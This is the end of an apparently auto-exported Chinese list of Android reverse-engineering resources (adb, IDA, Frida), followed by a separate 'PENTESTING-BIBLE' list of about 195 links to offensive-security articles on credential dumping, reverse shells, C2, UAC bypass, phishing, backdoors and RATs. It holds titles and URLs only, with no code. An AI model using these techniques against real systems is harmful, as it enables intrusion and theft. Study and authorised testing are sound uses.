[21cnbao] [让Android adb运行在ARM平台上](https://blog.csdn.net/21cnbao/article/details/7527373) - 2012.02 [conowen] [【整理】adb命令、adb shell与Linux各种命令(busybox)](https://blog.csdn.net/conowen/article/details/7262735) - 2011.12 [winsunxu] [android adb 端口转发](https://blog.csdn.net/winsunxu/article/details/7042972) - 2011.11 [xyz] [adb logcat 查看日志](https://blog.csdn.net/xyz_lmn/article/details/7004710) - 2011.11 [nvisium] [Kindle Fire Security, Part II- ADB, DropBox Manager](https://nvisium.com/blog/2011/11/22/kindle-fire-security-part-ii-adb/) - 2011.11 [xyz] [adb shell top](https://blog.csdn.net/xyz_lmn/article/details/7002015) - 2011.11 [xyz] [adb shell 命令](https://blog.csdn.net/xyz_lmn/article/details/7002008) - 2011.11 [xyz] [adb shell dumpsys 命令 查看内存](https://blog.csdn.net/xyz_lmn/article/details/7001892) - 2011.07 [pediy] [[原创]Android adb setuid提权漏洞的分析](https://bbs.pediy.com/thread-136707.htm) - 2011.03 [androidcracking] [spoof getinstallerpackagename with adb](http://androidcracking.blogspot.com/2011/03/spoof-getinstallerpackagename-with-adb.html) - 2011.01 [c] [adb trickery #2](https://c-skills.blogspot.com/2011/01/adb-trickery-again.html) - 2009.05 [beyoundtestdrive] [connect G1 phone to adb on Ubuntu](http://beyoundtestdrive.blogspot.com/2009/05/connect-g1-phone-to-adb-on-ubuntu.html) *** ## <a id="92fdafffc262b0a0427a9f2e40203503"></a>IDA Pro ### <a id="50fae763dd75614bc2f4390fba4925a3"></a>工具 - [**122**星][4y] [Py] [cvvt/dumpdex](https://github.com/cvvt/dumpdex) 基于IDA python的Android DEX内存dump工具 - [**84**星][2y] [Py] [zhkl0228/androidattacher](https://github.com/zhkl0228/androidattacher) IDA debugging plugin for android armv7 so - [**39**星][3y] [Py] [thecjw/ida_android_script](https://github.com/thecjw/ida_android_script) 辅助Android调试的IDAPython脚本 - [**29**星][9m] [Py] [enovella/re-scripts](https://github.com/enovella/re-scripts) IDA/Ghidra/Radare2脚本收集(无文档) ### <a id="f19c751a88ffad37105cdd3da817e70a"></a>文章 - 2017.10 [pediy] [[原创]-------------IDA调试 android so文件的10个技巧](https://bbs.pediy.com/thread-221876.htm) - 2016.03 [pediy] [[原创]IDA插件,一键附加调试android so](https://bbs.pediy.com/thread-208308.htm) - 2016.01 [pediy] [[原创]Android 5.0 + IDA 6.8 调试经验分享](https://bbs.pediy.com/thread-207548.htm) - 2013.06 [trustwave] [使用IDA调试Android库](https://www.trustwave.com/Resources/SpiderLabs-Blog/Debugging-Android-Libraries-using-IDA/) - 2012.02 [pediy] [[原创]IDA Android Remote Debug](https://bbs.pediy.com/thread-146721.htm) - 2011.10 [pediy] [[转帖]IDA PRO 6.1 远程调试 Android](https://bbs.pediy.com/thread-141739.htm) - 2011.07 [pediy] [关于ida调试android elf可执行文件](https://bbs.pediy.com/thread-137536.htm) *** ## <a id="ac4c5990ef8ae8de989ee9160684127b"></a>Frida ### <a id="5200b384a3876135b11fedf6f23496ce"></a>工具 - [**926**星][8m] [JS] [dpnishant/appmon](https://github.com/dpnishant/appmon) 用于监视和篡改本地macOS,iOS和android应用程序的系统API调用的自动化框架。基于Frida。 - [**550**星][7m] [JS] [wooyundota/droidsslunpinning](https://github.com/wooyundota/droidsslunpinning) Android certificate pinning disable tools - [**510**星][1m] [JS] [lyxhh/lxhtoolhttpdecrypt](https://github.com/lyxhh/lxhtoolhttpdecrypt) Simple Android/iOS protocol analysis and utilization tool - [**208**星][1m] [JS] [xiaokanghub/frida-android-unpack](https://github.com/xiaokanghub/frida-android-unpack) this unpack script for Android O and Android P - [**185**星][2m] [TS] [chame1eon/jnitrace](https://github.com/chame1eon/jnitrace) A Frida based tool that traces usage of the JNI API in Android apps. - [**114**星][2y] [C] [b-mueller/frida-detection-demo](https://github.com/b-mueller/frida-detection-demo) Some examples for detecting frida on Android - [**106**星][1m] [JS] [thecjw/frida-android-scripts](https://github.com/thecjw/frida-android-scripts) Some frida scripts - [**104**星][3m] [JS] [frida/frida-java-bridge](https://github.com/frida/frida-java-bridge) Java runtime interop from Frida - [**88**星][2y] [Py] [mind0xp/frida-python-binding](https://github.com/mind0xp/frida-python-binding) Easy to use Frida python binding script - [**78**星][4m] [JS] [andreafioraldi/frida-js-afl-instr](https://github.com/andreafioraldi/frida-js-afl-instr) An example on how to do performant in-memory fuzzing with AFL++ and Frida - [**65**星][2m] [C] [darvincisec/detectfrida](https://github.com/darvincisec/detectfrida) Detect Frida for Android - [**57**星][11m] [JS] [hamz-a/frida-android-libbinder](https://github.com/hamz-a/frida-android-libbinder) PoC Frida script to view Android libbinder traffic - [**55**星][1m] [Java] [igio90/fridaandroidinjector](https://github.com/igio90/fridaandroidinjector) Inject frida agents on local processes through an Android app - [**54**星][2m] [Py] [hamz-a/frida-android-helper](https://github.com/hamz-a/frida-android-helper) Frida Android utilities - [**52**星][1y] [feicong/zsxq_archives](https://github.com/feicong/zsxq_archives) 【软件安全与知识星球】精华文章列表 - [**50**星][1y] [JS] [fortiguard-lion/frida-scripts](https://github.com/fortiguard-lion/frida-scripts) some FRIDA scripts used for Android RE - [**46**星][3y] [Py] [ikoz/jdwp-lib-injector](https://github.com/ikoz/jdwp-lib-injector) inject native shared libraries into debuggable Android applications - [**43**星][1m] [TS] [oleavr/frida-agent-example](https://github.com/oleavr/frida-agent-example) Example Frida agent written in TypeScript - [**31**星][2m] [JS] [fsecurelabs/android-keystore-audit](https://github.com/fsecurelabs/android-keystore-audit) - [**30**星][1y] [JS] [ioactive/bluecrawl](https://github.com/ioactive/bluecrawl) Frida (Android) Script for extracting bluetooth information - [**21**星][1m] [JS] [iddoeldor/mplus](https://github.com/iddoeldor/mplus) Intercept android apps based on unity3d (Mono) using Frida - [**19**星][2y] [Py] [notsosecure/dynamic-instrumentation-with-frida](https://github.com/notsosecure/dynamic-instrumentation-with-frida) Dynamic Instrumentation with Frida - [**18**星][3m] [Py] [igio90/fridaandroidtracer](https://github.com/igio90/fridaandroidtracer) Android application tracer powered by Frida - [**1**星][1y] [JS] [ddurando/frida-scripts](https://github.com/ddurando/frida-scripts) ### <a id="f9fd19a349a4b18d553d0c4ec4865764"></a>文章 - 2020.03 [freebuf] [如何使用Frida绕过Android网络安全配置](https://www.freebuf.com/vuls/227697.html) - 2019.10 [freebuf] [使用Frida绕过Android App的SSL Pinning](https://www.freebuf.com/articles/terminal/214540.html) - 2019.04 [ved] [Hail Frida!! The Universal SSL pinning bypass for Android.](https://medium.com/p/e9e1d733d29) - 2019.04 [securify] [Frida Android libbinder](https://www.securify.nl/en/blog/SFY20190424/frida-android-libbinder.html) - 2018.12 [pediy] [[原创] Frida操作手册-Android环境准备](https://bbs.pediy.com/thread-248293.htm) - 2018.11 [4hou] [使用FRIDA为Android应用进行脱壳的操作指南](http://www.4hou.com/technology/14404.html) - 2018.11 [pediy] [[原创]Frida Bypass Android SSL pinning example 1](https://bbs.pediy.com/thread-247967.htm) - 2018.11 [360] [如何使用FRIDA搞定Android加壳应用](https://www.anquanke.com/post/id/163390/) - 2018.11 [fortinet] [How-to Guide: Defeating an Android Packer with FRIDA](https://www.fortinet.com/blog/threat-research/defeating-an-android-packer-with-frida.html) - 2018.10 [serializethoughts] [Bypassing Android FLAG_SECURE using FRIDA](https://serializethoughts.com/2018/10/07/bypassing-android-flag_secure-using-frida/) - 2018.06 [pediy] [[原创]关于android 微信 frida 使用技巧](https://bbs.pediy.com/thread-228746.htm) - 2018.05 [aliyun] [Frida.Android.Practice (ssl unpinning)](https://xz.aliyun.com/t/2336) - 2018.03 [pediy] [[翻译]使用 Frida 逆向分析 Android 应用与 BLE 设备的通信](https://bbs.pediy.com/thread-224926.htm) - 2018.02 [pentestpartners] [Reverse Engineering BLE from Android apps with Frida](https://www.pentestpartners.com/security-blog/reverse-engineering-ble-from-android-apps-with-frida/) - 2017.08 [360] [如何利用Frida实现原生Android函数的插桩](https://www.anquanke.com/post/id/86653/) - 2017.08 [notsosecure] [如何动态调整使用 Android 的NDK 编写的代码,即:使用 Frida Hook C/ C++ 开发的功能。](https://www.notsosecure.com/instrumenting-native-android-functions-using-frida/) - 2017.07 [360] [使用Frida绕过Android SSL Re-Pinning](https://www.anquanke.com/post/id/86507/) - 2017.07 [mediaservice] [使用 Frida 绕过 AndroidSSL Pinning](https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/) - 2017.07 [koz] [无需 Root 向 AndroidApp 中注入原生库(例如 Frida)](https://koz.io/library-injection-for-debuggable-android-apps/) - 2017.06 [360] [利用FRIDA攻击Android应用程序(四)](https://www.anquanke.com/post/id/86201/) - 2017.05 [4hou] [Android APP破解利器Frida之反调试对抗](http://www.4hou.com/technology/4584.html) - 2017.05 [360] [利用FRIDA攻击Android应用程序(三)](https://www.anquanke.com/post/id/85996/) - 2017.04 [codemetrix] [Hacking Android apps with FRIDA III - OWASP UnCrackable 2](https://codemetrix.net/hacking-android-apps-with-frida-3/) - 2017.04 [koz] [不用Root就可以在安卓上使用Frida。](https://koz.io/using-frida-on-android-without-root/) - 2017.03 [360] [利用FRIDA攻击Android应用程序(二)](https://www.anquanke.com/post/id/85759/) - 2017.03 [360] [利用FRIDA攻击Android应用程序(一)](https://www.anquanke.com/post/id/85758/) - 2017.03 [notsosecure] [使用 Frida 审计安卓App和安全漏洞](https://www.notsosecure.com/pentesting-android-apps-using-frida/) - 2017.03 [codemetrix] [使用Frida Hack安卓App(Part 2)](https://codemetrix.net/hacking-android-apps-with-frida-2/) - 2017.03 [codemetrix] [使用Frida Hack安卓App(Part 1)](https://codemetrix.net/hacking-android-apps-with-frida-1/) # <a id="ea3c7c05861352ae1d05ce28cf745e7e"></a>工具 # <a id="39226e999eb0a6673919aeea22921d0b"></a>文章 # 贡献 内容为系统自动导出, 有任何问题请提issue
# PENTESTING-BIBLE # hundreds of ethical hacking &amp; penetration testing &amp; red team &amp; cyber security &amp; computer science resources. # MORE THAN 1000 LINK # MORE TO COME -1- 3 Ways Extract Password Hashes from NTDS.dit: https://www.hackingarticles.in/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: https://www.hackingarticles.in/3-ways-to-capture-http-password-in-network-pc/ -3- 3 Ways to Crack Wifi using Pyrit,oclHashcat and Cowpatty: www.hackingarticles.in/3-ways-crack-wifi-using-pyrit-oclhashcat-cowpatty/ -4-BugBounty @ Linkedln-How I was able to bypass Open Redirection Protection: https://medium.com/p/2e143eb36941 -5-BugBounty — “Let me reset your password and login into your account “-How I was able to Compromise any User Account via Reset Password Functionality: https://medium.com/p/a11bb5f863b3/share/twitter -6-“Journey from LFI to RCE!!!”-How I was able to get the same in one of the India’s popular property buy/sell company: https://medium.com/p/a69afe5a0899 -7-BugBounty — “I don’t need your current password to login into your account” - How could I completely takeover any user’s account in an online classi ed ads company: https://medium.com/p/e51a945b083d -8-BugBounty — “How I was able to shop for free!”- Payment Price Manipulation: https://medium.com/p/b29355a8e68e -9-Recon — my way: https://medium.com/p/82b7e5f62e21 -10-Reconnaissance: a eulogy in three acts: https://medium.com/p/7840824b9ef2 -11-Red-Teaming-Toolkit: https://github.com/infosecn1nja/Red-Teaming-Toolkit -12-Red Team Tips: https://vincentyiu.co.uk/ -13-Shellcode: A reverse shell for Linux in C with support for TLS/SSL: https://modexp.wordpress.com/2019/04/24/glibc-shellcode/ -14-Shellcode: Encrypting traffic: https://modexp.wordpress.com/2018/08/17/shellcode-encrypting-traffic/ -15-Penetration Testing of an FTP Server: https://medium.com/p/19afe538be4b -16-Reverse Engineering of the Anubis Malware — Part 1: https://medium.com/p/741e12f5a6bd -17-Privilege Escalation on Linux with Live examples: https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/ -18-Pentesting Cheatsheets: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets -19-Powershell Payload Delivery via DNS using Invoke-PowerCloud: https://ired.team/offensive-security-experiments/payload-delivery-via-dns-using-invoke-powercloud -20-SMART GOOGLE SEARCH QUERIES TO FIND VULNERABLE SITES – LIST OF 4500+ GOOGLE DORKS: https://sguru.org/ghdb-download-list-4500-google-dorks-free/ -21-SQL Injection Cheat Sheet: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ -22-SQLmap’s os-shell + Backdooring website with Weevely: https://medium.com/p/8cb6dcf17fa4 -23-SQLMap Tamper Scripts (SQL Injection and WAF bypass) Tips: https://medium.com/p/c5a3f5764cb3 -24-Top 10 Essential NMAP Scripts for Web App Hacking: https://medium.com/p/c7829ff5ab7 -25-BugBounty — How I was able to download the Source Code of India’s Largest Telecom Service Provider including dozens of more popular websites!: https://medium.com/p/52cf5c5640a1 -26-Re ected XSS Bypass Filter: https://medium.com/p/de41d35239a3 -27-XSS Payloads, getting past alert(1): https://medium.com/p/217ab6c6ead7 -28-XS-Searching Google’s bug tracker to find out vulnerable source code Or how side-channel timing attacks aren’t that impractical: https://medium.com/p/50d8135b7549 -29-Web Application Firewall (WAF) Evasion Techniques: https://medium.com/@themiddleblue/web-application-firewall-waf-evasion-techniques -30-OSINT Resources for 2019: https://medium.com/p/b15d55187c3f -31-The OSINT Toolkit: https://medium.com/p/3b9233d1cdf9 -32-OSINT : Chasing Malware + C&C Servers: https://medium.com/p/3c893dc1e8cb -33-OSINT tool for visualizing relationships between domains, IPs and email addresses: https://medium.com/p/94377aa1f20a -34-From OSINT to Internal – Gaining Access from outside the perimeter: https://www.n00py.io/.../from-osint-to-internal-gaining-access-from-the-outside-the-perimeter -35-Week in OSINT #2018–35: https://medium.com/p/b2ab1765157b -36-Week in OSINT #2019–14: https://medium.com/p/df83f5b334b4 -37-Instagram OSINT | What A Nice Picture: https://medium.com/p/8f4c7edfbcc6 -38-awesome-osint: https://github.com/jivoi/awesome-osint -39-OSINT_Team_Links: https://github.com/IVMachiavelli/OSINT_Team_Links -40-Open-Source Intelligence (OSINT) Reconnaissance: https://medium.com/p/75edd7f7dada -41-Hacking Cryptocurrency Miners with OSINT Techniques: https://medium.com/p/677bbb3e0157 -42-A penetration tester’s guide to sub- domain enumeration: https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6?gi=f44ec9d8f4b5 -43-Packages that actively seeks vulnerable exploits in the wild. More of an umbrella group for similar packages: https://blackarch.org/recon.html -44-What tools I use for my recon during BugBounty: https://medium.com/p/ec25f7f12e6d -45-Command and Control – DNS: https://pentestlab.blog/2017/09/06/command-and-control-dns/ -46-Command and Control – WebDAV: https://pentestlab.blog/2017/09/12/command-and-control-webdav/ -47-Command and Control – Twitter: https://pentestlab.blog/2017/09/26/command-and-control-twitter/ -48-Command and Control – Kernel: https://pentestlab.blog/2017/10/02/command-and-control-kernel/ -49-Source code disclosure via exposed .git folder: https://pentester.land/tutorials/.../source-code-disclosure-via-exposed-git-folder.html -50-Pentesting Cheatsheet: https://hausec.com/pentesting-cheatsheet/ -51-Windows Userland Persistence Fundamentals: https://www.fuzzysecurity.com/tutorials/19.html -52-A technique that a lot of SQL injection beginners don’t know | Atmanand Nagpure write-up: https://medium.com/p/abdc7c269dd5 -53-awesome-bug-bounty: https://github.com/djadmin/awesome-bug-bounty -54-dostoevsky-pentest-notes: https://github.com/dostoevskylabs/dostoevsky-pentest-notes -55-awesome-pentest: https://github.com/enaqx/awesome-pentest -56-awesome-windows-exploitation: https://github.com/enddo/awesome-windows-exploitation -57-awesome-exploit-development: https://github.com/FabioBaroni/awesome-exploit-development -58-BurpSuit + SqlMap = One Love: https://medium.com/p/64451eb7b1e8 -59-Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat: https://medium.com/p/a5a5d3ffea46 -60-DLL Injection: https://pentestlab.blog/2017/04/04/dll-injection -61-DLL Hijacking: https://pentestlab.blog/2017/03/27/dll-hijacking -62-My Recon Process — DNS Enumeration: https://medium.com/p/d0e288f81a8a -63-Google Dorks for nding Emails, Admin users etc: https://d4msec.wordpress.com/2015/09/03/google-dorks-for-finding-emails-admin-users-etc -64-Google Dorks List 2018: https://medium.com/p/fb70d0cbc94 -65-Hack your own NMAP with a BASH one-liner: https://medium.com/p/758352f9aece -66-UNIX / LINUX CHEAT SHEET: cheatsheetworld.com/programming/unix-linux-cheat-sheet/ -67-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced: https://medium.com/p/74d2bec02099 -68- information gathering: https://pentestlab.blog/category/information-gathering/ -69-post exploitation: https://pentestlab.blog/category/post-exploitation/ -70-privilege escalation: https://pentestlab.blog/category/privilege-escalation/ -71-red team: https://pentestlab.blog/category/red-team/ -72-The Ultimate Penetration Testing Command Cheat Sheet for Linux: https://www.hackingloops.com/command-cheat-sheet-for-linux/ -73-Web Application Penetration Testing Cheat Sheet: https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/ -74-Windows Kernel Exploits: https://pentestlab.blog/2017/04/24/windows-kernel-exploits -75-Windows oneliners to download remote payload and execute arbitrary code: https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ -76-Windows-Post-Exploitation: https://github.com/emilyanncr/Windows-Post-Exploitation -77-Windows Post Exploitation Shells and File Transfer with Netcat for Windows: https://medium.com/p/a2ddc3557403 -78-Windows Privilege Escalation Fundamentals: https://www.fuzzysecurity.com/tutorials/16.html -79-Windows Privilege Escalation Guide: www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ -80-Windows Active Directory Post Exploitation Cheatsheet: https://medium.com/p/48c2bd70388 -81-Windows Exploitation Tricks: Abusing the User-Mode Debugger: https://googleprojectzero.blogspot.com/2019/04/windows-exploitation-tricks-abusing.html -82-VNC Penetration Testing (Port 5901): http://www.hackingarticles.in/vnc-penetration-testing -83- Big List Of Google Dorks Hacking: https://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking -84-List of google dorks for sql injection: https://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/ -85-Download Google Dorks List 2019: https://medium.com/p/323c8067502c -86-Comprehensive Guide to Sqlmap (Target Options): http://www.hackingarticles.in/comprehensive-guide-to-sqlmap-target-options15249-2 -87-EMAIL RECONNAISSANCE AND PHISHING TEMPLATE GENERATION MADE SIMPLE: www.cybersyndicates.com/.../email-reconnaissance-phishing-template-generation-made-simple -88-Comprehensive Guide on Gobuster Tool: https://www.hackingarticles.in/comprehensive-guide-on-gobuster-tool/ -89-My Top 5 Web Hacking Tools: https://medium.com/p/e15b3c1f21e8 -90-[technical] Pen-testing resources: https://medium.com/p/cd01de9036ad -91-File System Access on Webserver using Sqlmap: http://www.hackingarticles.in/file-system-access-on-webserver-using-sqlmap -92-kali-linux-cheatsheet: https://github.com/NoorQureshi/kali-linux-cheatsheet -93-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -94-Command Injection Exploitation through Sqlmap in DVWA (OS-cmd): http://www.hackingarticles.in/command-injection-exploitation-through-sqlmap-in-dvwa -95-XSS Payload List - Cross Site Scripting Vulnerability Payload List: https://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html -96-Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection: https://www.notsosecure.com/analyzing-cve-2018-6376/ -97-Exploiting Sql Injection with Nmap and Sqlmap: http://www.hackingarticles.in/exploiting-sql-injection-nmap-sqlmap -98-awesome-malware-analysis: https://github.com/rshipp/awesome-malware-analysis -99-Anatomy of UAC Attacks: https://www.fuzzysecurity.com/tutorials/27.html -100-awesome-cyber-skills: https://github.com/joe-shenouda/awesome-cyber-skills -101-5 ways to Banner Grabbing: http://www.hackingarticles.in/5-ways-banner-grabbing -102-6 Ways to Hack PostgresSQL Login: http://www.hackingarticles.in/6-ways-to-hack-postgressql-login -103-6 Ways to Hack SSH Login Password: http://www.hackingarticles.in/6-ways-to-hack-ssh-login-password -104-10 Free Ways to Find Someone’s Email Address: https://medium.com/p/e6f37f5fe10a -105-USING A SCF FILE TO GATHER HASHES: https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes -106-Hack Remote Windows PC using DLL Files (SMB Delivery Exploit): http://www.hackingarticles.in/hack-remote-windows-pc-using-dll-files-smb-delivery-exploit 107-Hack Remote Windows PC using Office OLE Multiple DLL Hijack Vulnerabilities: http://www.hackingarticles.in/hack-remote-windows-pc-using-office-ole-multiple-dll-hijack-vulnerabilities -108-BUG BOUNTY HUNTING (METHODOLOGY , TOOLKIT , TIPS & TRICKS , Blogs): https://medium.com/p/ef6542301c65 -109-How To Perform External Black-box Penetration Testing in Organization with “ZERO” Information: https://gbhackers.com/external-black-box-penetration-testing -110-A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals: https://gbhackers.com/hacking-tools-list -111-Most Important Considerations with Malware Analysis Cheats And Tools list: https://gbhackers.com/malware-analysis-cheat-sheet-and-tools-list -112-Awesome-Hacking: https://github.com/Hack-with-Github/Awesome-Hacking -113-awesome-threat-intelligence: https://github.com/hslatman/awesome-threat-intelligence -114-awesome-yara: https://github.com/InQuest/awesome-yara -115-Red-Team-Infrastructure-Wiki: https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki -116-awesome-pentest: https://github.com/enaqx/awesome-pentest -117-awesome-cyber-skills: https://github.com/joe-shenouda/awesome-cyber-skills -118-pentest-wiki: https://github.com/nixawk/pentest-wiki -119-awesome-web-security: https://github.com/qazbnm456/awesome-web-security -120-Infosec_Reference: https://github.com/rmusser01/Infosec_Reference -121-awesome-iocs: https://github.com/sroberts/awesome-iocs -122-blackhat-arsenal-tools: https://github.com/toolswatch/blackhat-arsenal-tools -123-awesome-social-engineering: https://github.com/v2-dev/awesome-social-engineering -124-Penetration Testing Framework 0.59: www.vulnerabilityassessment.co.uk/Penetration%20Test.html -125-Penetration Testing Tools Cheat Sheet : https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/ -126-SN1PER – A Detailed Explanation of Most Advanced Automated Information Gathering & Penetration Testing Tool: https://gbhackers.com/sn1per-a-detailed-explanation-of-most-advanced-automated-information-gathering-penetration-testing-tool -127-Spear Phishing 101: https://blog.inspired-sec.com/archive/2017/05/07/Phishing.html -128-100 ways to discover (part 1): https://sylarsec.com/2019/01/11/100-ways-to-discover-part-1/ -129-Comprehensive Guide to SSH Tunnelling: http://www.hackingarticles.in/comprehensive-guide-to-ssh-tunnelling/ -130-Capture VNC Session of Remote PC using SetToolkit: http://www.hackingarticles.in/capture-vnc-session-remote-pc-using-settoolkit/ -131-Hack Remote PC using PSEXEC Injection in SET Toolkit: http://www.hackingarticles.in/hack-remote-pc-using-psexec-injection-set-toolkit/ -132-Denial of Service Attack on Network PC using SET Toolkit: http://www.hackingarticles.in/denial-of-service-attack-on-network-pc-using-set-toolkit/ -133-Hack Gmail and Facebook of Remote PC using DNS Spoofing and SET Toolkit: http://www.hackingarticles.in/hack-gmail-and-facebook-of-remote-pc-using-dns-spoofing-and-set-toolkit/ -134-Hack Any Android Phone with DroidJack (Beginner’s Guide): http://www.hackingarticles.in/hack-android-phone-droidjack-beginners-guide/ -135-HTTP RAT Tutorial for Beginners: http://www.hackingarticles.in/http-rat-tutorial-beginners/ -136-5 ways to Create Permanent Backdoor in Remote PC: http://www.hackingarticles.in/5-ways-create-permanent-backdoor-remote-pc/ -137-How to Enable and Monitor Firewall Log in Windows PC: http://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/ -138-EMPIRE TIPS AND TRICKS: https://enigma0x3.net/2015/08/26/empire-tips-and-tricks/ -139-CSRF account takeover Explained Automated/Manual: https://medium.com/p/447e4b96485b -140-CSRF Exploitation using XSS: http://www.hackingarticles.in/csrf-exploitation-using-xss -141-Dumping Domain Password Hashes: https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/ -142-Empire Post Exploitation – Unprivileged Agent to DA Walkthrough: https://bneg.io/2017/05/24/empire-post-exploitation/ -143-Dropbox for the Empire: https://bneg.io/2017/05/13/dropbox-for-the-empire/ -144-Empire without PowerShell.exe: https://bneg.io/2017/07/26/empire-without-powershell-exe/ -145-REVIVING DDE: USING ONENOTE AND EXCEL FOR CODE EXECUTION: https://enigma0x3.net/2018/01/29/reviving-dde-using-onenote-and-excel-for-code-execution/ -146-PHISHING WITH EMPIRE: https://enigma0x3.net/2016/03/15/phishing-with-empire/ -146-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ -147-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND REGISTRY HIJACKING: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ -148-“FILELESS” UAC BYPASS USING SDCLT.EXE: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ -149-PHISHING AGAINST PROTECTED VIEW: https://enigma0x3.net/2017/07/13/phishing-against-protected-view/ -150-LATERAL MOVEMENT USING EXCEL.APPLICATION AND DCOM: https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/ -151-enum4linux Cheat Sheet: https://highon.coffee/blog/enum4linux-cheat-sheet/ -152-enumeration: https://technologyredefine.blogspot.com/2017/11/enumeration.html -153-Command and Control – WebSocket: https://pentestlab.blog/2017/12/06/command-and-control-websocket -154-Command and Control – WMI: https://pentestlab.blog/2017/11/20/command-and-control-wmi -155-Dangerous Virus For Windows Crashes Everything Hack window Using Virus: http://thelearninghacking.com/create-virus-hack-windows/ -156-Comprehensive Guide to Nmap Port Status: http://www.hackingarticles.in/comprehensive-guide-nmap-port-status -157-Commix – Automated All-in-One OS Command Injection and Exploitation Tool: https://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool -158-Compromising Jenkins and extracting credentials: https://www.n00py.io/2017/01/compromising-jenkins-and-extracting-credentials/ -159-footprinting: https://technologyredefine.blogspot.com/2017/09/footprinting_17.html -160-awesome-industrial-control-system-security: https://github.com/hslatman/awesome-industrial-control-system-security -161-xss-payload-list: https://github.com/ismailtasdelen/xss-payload-list -162-awesome-vehicle-security: https://github.com/jaredthecoder/awesome-vehicle-security -163-awesome-osint: https://github.com/jivoi/awesome-osint -164-awesome-python: https://github.com/vinta/awesome-python -165-Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit): https://www.exploit-db.com/download/44830.rb -166-nbtscan Cheat Sheet: https://highon.coffee/blog/nbtscan-cheat-sheet/ -167-neat-tricks-to-bypass-csrfprotection: www.slideshare.net/0ang3el/neat-tricks-to-bypass-csrfprotection -168-ACCESSING CLIPBOAR D FROM THE LOC K SC REEN IN WI NDOWS 10 #2: https://oddvar.moe/2017/01/27/access-clipboard-from-lock-screen-in-windows-10-2/ -169-NMAP CHEAT-SHEET (Nmap Scanning Types, Scanning Commands , NSE Scripts): https://medium.com/p/868a7bd7f692 -170-Nmap Cheat Sheet: https://highon.coffee/blog/nmap-cheat-sheet/ -171-Powershell Without Powershell – How To Bypass Application Whitelisting, Environment Restrictions & AV: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ -172-Phishing with PowerPoint: https://www.blackhillsinfosec.com/phishing-with-powerpoint/ -173-hide-payload-ms-office-document-properties: https://www.blackhillsinfosec.com/hide-payload-ms-office-document-properties/ -174-How to Evade Application Whitelisting Using REGSVR32: https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/ -175-How to Build a C2 Infrastructure with Digital Ocean – Part 1: https://www.blackhillsinfosec.com/build-c2-infrastructure-digital-ocean-part-1/ -176-WordPress Penetration Testing using Symposium Plugin SQL Injection: http://www.hackingarticles.in/wordpress-penetration-testing-using-symposium-plugin-sql-injection -177-Manual SQL Injection Exploitation Step by Step: http://www.hackingarticles.in/manual-sql-injection-exploitation-step-step -178-MSSQL Penetration Testing with Metasploit: http://www.hackingarticles.in/mssql-penetration-testing-metasploit -179-Multiple Ways to Get root through Writable File: http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file -180-MySQL Penetration Testing with Nmap: http://www.hackingarticles.in/mysql-penetration-testing-nmap -181-NetBIOS and SMB Penetration Testing on Windows: http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows -182-Network Packet Forensic using Wireshark: http://www.hackingarticles.in/network-packet-forensic-using-wireshark -183-Escape and Evasion Egressing Restricted Networks: https://www.optiv.com/blog/escape-and-evasion-egressing-restricted-networks/ -183-Awesome-Hacking-Resources: https://github.com/vitalysim/Awesome-Hacking-Resources -184-Hidden directories and les as a source of sensitive information about web application: https://medium.com/p/84e5c534e5ad -185-Hiding Registry keys with PSRe ect: https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353 -186-awesome-cve-poc: https://github.com/qazbnm456/awesome-cve-poc -187-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced: https://medium.com/p/74d2bec02099 -188-Post Exploitation in Windows using dir Command: http://www.hackingarticles.in/post-exploitation-windows-using-dir-command 189-Web Application Firewall (WAF) Evasion Techniques #2: https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0 -190-Forensics Investigation of Remote PC (Part 1): http://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-1 -191-CloudFront Hijacking: https://www.mindpointgroup.com/blog/pen-test/cloudfront-hijacking/ -192-PowerPoint and Custom Actions: https://cofense.com/powerpoint-and-custom-actions/ -193-Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 using Potato: http://www.hackingarticles.in/privilege-escalation-on-windows-7810-server-2008-server-2012-using-potato -194-How to intercept TOR hidden service requests with Burp: https://medium.com/p/6214035963a0 -195-How to Make a Captive Portal of Death: https://medium.com/p/48e82a1d81a/share/twitter 